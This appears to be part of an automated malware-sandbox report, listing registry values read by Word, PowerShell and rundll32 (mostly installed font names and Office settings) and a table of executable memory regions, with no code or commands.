C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Agency FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aharoni
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Algerian
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Andalus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Angsana New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
AngsanaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aparajita
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arabic Typesetting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Narrow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Rounded MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Baskerville Old Face
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bauhaus 93
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bell MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bernard MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Blackadder ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Poster Compressed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Book Antiqua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookman Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookshelf Symbol 7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bradley Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Britannic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Broadway
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Browallia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BrowalliaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Brush Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Californian FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calisto MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Candara
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Castellar
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Centaur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Schoolbook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Chiller
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Colonna MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Comic Sans MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Consolas
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Constantia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cooper Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Corbel
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cordia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
CordiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Courier New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Curlz MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DaunPenh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
David
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DilleniaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DokChampa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ebrima
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Edwardian Script ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Elephant
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Engravers MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Bold ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Demi ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Light ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Medium ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Estrangelo Edessa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EucrosiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Euphemia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Felix Titling
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Footlight MT Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Forte
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Book
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Heavy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FrankRuehl
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FreesiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Freestyle Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
French Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gabriola
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Garamond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gautami
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Georgia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gigi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Ext Condensed Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gisha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gloucester MT Extra Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Stout
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Haettenschweiler
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harlow Solid Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harrington
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
High Tower Text
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Impact
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Imprint MT Shadow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Informal Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
IrisUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Iskoola Pota
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
JasmineUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Jokerman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Juice ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kalinga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kartika
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Khmer UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KodchiangUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kokila
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kristen ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kunstler Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lao UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Latha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Leelawadee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Levenim MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LilyUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Bright
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Calligraphy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Console
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Fax
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Handwriting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Typewriter
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Unicode
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Magneto
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Maiandra GD
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mangal
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Marlett
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Matura MT Script Capitals
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Himalaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft New Tai Lue
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft PhagsPa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Tai Le
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Uighur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Yi Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mistral
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Modern No. 20
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mongolian Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Monotype Corsiva
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MoolBoran
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Outlook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Specialty
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MT Extra
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MV Boli
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Narkisim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Engraved
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Solid
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Nyala
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
OCR A Extended
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Old English Text MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Onyx
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palace Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palatino Linotype
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Papyrus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Parchment
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua Titling MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Plantagenet Cherokee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Playbill
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Poor Richard
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Pristina
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Raavi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rage Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ravie
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rod
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sakkal Majalla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Script MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Print
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Semibold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shonar Bangla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Showcard Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shruti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Snap ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Stencil
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sylfaen
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tempus Sans ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Times New Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Traditional Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Trebuchet MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tunga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Utsaah
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vani
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Verdana
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vijaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Viner Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vivaldi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vladimir Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vrinda
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Webdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wide Latin
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 2
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 3
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F5D6C
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LastPurgeTime
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
WORDFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F5D6C
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Settings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ZoomApp
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTF
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTA
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\system32\qagentrt.dll,-10
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\System32\fveui.dll,-843
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\System32\fveui.dll,-844
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\System32\wuaueng.dll,-400
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\SysWOW64\rundll32.exe
|
SavedLegacySettings
|
There are 338 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
200000
|
unkown
|
page execute and read and write
|
||
1C0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
1E0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
220000
|
unkown
|
page execute and read and write
|
||
1E0000
|
unkown
|
page execute and read and write
|
||
3B0000
|
unkown
|
page execute and read and write
|
||
1C0000
|
unkown
|
page execute and read and write
|
||
250000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
180000
|
unkown
|
